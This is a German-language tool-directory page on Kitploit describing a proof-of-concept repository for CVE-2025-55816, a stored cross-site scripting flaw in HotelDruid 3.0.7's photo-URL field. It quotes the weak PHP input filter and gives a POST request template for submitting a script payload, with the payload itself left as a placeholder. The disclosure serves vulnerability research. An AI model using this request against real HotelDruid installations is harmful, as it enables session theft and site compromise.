Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55816 — CVE-2025-55816 HotelDruid 3.0.7 | Kitploit
Tools/GitHubGitHub/partywavesec/cve-2025-55816
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubpartywavesec/cve-2025-55816

CVE-2025-55816

CVE-2025-55816 HotelDruid 3.0.7

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55816

CVE-2025-55816 HotelDruid 3.0.7

  • Autor: partywave
  • Kollaboration: Raptx-Team

Externe Referenzen

  • HotelDruid 3.0.8 Changelog
  • CVE-Blogbeitrag
  • Raptx-Website

Schwachstelle

Die Schwachstelle ist ein einfaches Stored Cross Site Scripting (XSS) im Endpunkt /modifica_app.php.

Aufgrund fehlender Sicherheitsmaßnahmen kann der Angreifer einen als URL getarnten JavaScript-Payload in die Funktion 'New Photo Url' einschleusen.

Der verwundbare Code ist in HotelDruid <= 3.0.7 in der Datei www\modifica_app.php verfügbar:

root@kitploit:~
if (!empty($aggurlfoto)) {
    $mostra_form_modifica = "NO";
    $dest = "#aggfoto";
    $errore = "";

    if (@get_magic_quotes_gpc()) {
        $n_urlfoto = stripslashes($n_urlfoto);
    }

    $lowurl = strtolower($n_urlfoto);

    if (
        substr($lowurl, -4) != ".jpg" &&
        substr($lowurl, -5) != ".jpeg" &&
        substr($lowurl, -4) != ".gif" &&
        substr($lowurl, -4) != ".png" &&
        substr($lowurl, -5) != ".webp"
    ) {
        $errore = "SI";
    }

    if (
        str_replace("<", "", $n_urlfoto) != $n_urlfoto ||
        str_replace(">", "", $n_urlfoto) != $n_urlfoto ||
        str_replace("\"", "", $n_urlfoto) != $n_urlfoto
    ) {
        $errore = "SI";
    }

Die Schwachstelle kann zu weiterer Ausnutzung führen. Ein wenig Codeanalyse und Payload-Entwicklung sind im Blogbeitrag verfügbar.

HTTP-Anfrage

Sie können den Payload mit der folgenden POST-Anfrage übermitteln:

root@kitploit:~
POST /modifica_app.php HTTP/1.1
Host: 127.0.0.1:57146
....
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Length: 1121
....

------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="anno"

[year]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="id_sessione"

[sessionid]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="idappartamenti"

[apartmentid]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="aggurlfoto"

SI
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="n_urlfoto"

[payload]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d--
Tool herunterladen